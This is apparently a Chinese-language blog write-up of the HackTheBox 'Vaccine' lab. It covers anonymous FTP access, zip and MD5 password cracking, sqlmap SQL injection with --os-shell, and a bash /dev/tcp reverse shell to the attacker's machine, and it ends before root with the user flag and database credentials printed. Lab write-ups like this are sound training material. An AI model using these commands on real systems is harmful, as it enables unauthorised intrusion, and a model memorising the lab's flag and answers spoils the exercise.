Hackthebox Vaccine攻略(由于目标机器不稳定,到root flag阶段放弃)

Task 1

Besides SSH and HTTP, what other service is hosted on this box?

思路:

#nmap -sV 10.129.225.149

答案:ftp

 

Task 2

This service can be configured to allow login with any password for specific username. What is that username?

思路:

#nmap -sC 10.129.225.149

扫描结果:Anonymous FTP login allowed (FTP code 230)

答案:Anonymous

 

Task 3

What is the name of the file downloaded over this service?

思路:

匿名登录FTP服务

# ftp 10.129.225.149

#ls 发现有文件backup.zip

答案: backup.zip

 

Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

思路:

按照题面去猜,就是需要转换成hash文件然后用John进行破解,谷歌一下得到答案。

答案:zip2john

 

Task 5

What is the password for the admin user on the website?

思路:

在利用john破解之前,先转换成hash文件

# zip2john backup.zip > jason_password.hash

john --wordlist=/usr/share/john/password.lst backup.zip jason_password.hash

得到密码:741852963

打开backup.zip文件,得到文件index.php以及style.css

肯定首先关注index.php文件,看到了用户名以及密码(md5以后的密码)

if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3")

因此尝试破解该md5密码。

到网站:https://md5decrypt.net在线破解该密码,得到为:qwerty789

答案:qwerty789

 

Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection?

思路:sqlmap -h 看帮助

答案:--os-shell

 

Task 7

What program can the postgres user run as root using sudo?

思路:我是查google

答案:vi

      

        尝试登陆目标网站,并提取出cookie:

Cookie: PHPSESSID=nf0htii0o4od30mo131doalb1p

{"PHPSESSID":"nf0htii0o4od30mo131doalb1p"}

用SQL map发现search字段可注入

#sqlmap -u 'http://10.129.225.149/dashboard.php?search=sand' --cookie='PHPSESSID=nf0htii0o4od30mo131doalb1p' --os-shell

 

执行反向shell

#bash -c 'bash -i >& /dev/tcp/<Kali Linux Tun口的IP地址>/1234 0>&1'

成功

查找user.txt

find / -type f -name user.txt 2>/dev/null

/var/lib/postgresql/user.txt

打开该文件:得到用户flag: ec9b13ca4d6229cd5cc1e09980965bf7

   提升权限

   SHELL=/bin/bash script -q /dev/null

 

postgres@vaccine:/home/simon$ grep -C1 pg_connect /var/www/html/dashboard.php

grep -C1 pg_connect /var/www/html/dashboard.php

        try {

          $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

        }

postgres@vaccine:/home/simon$

posted @ 2022-03-28 19:33  Jason_huawen  阅读(275)  评论(0编辑  收藏  举报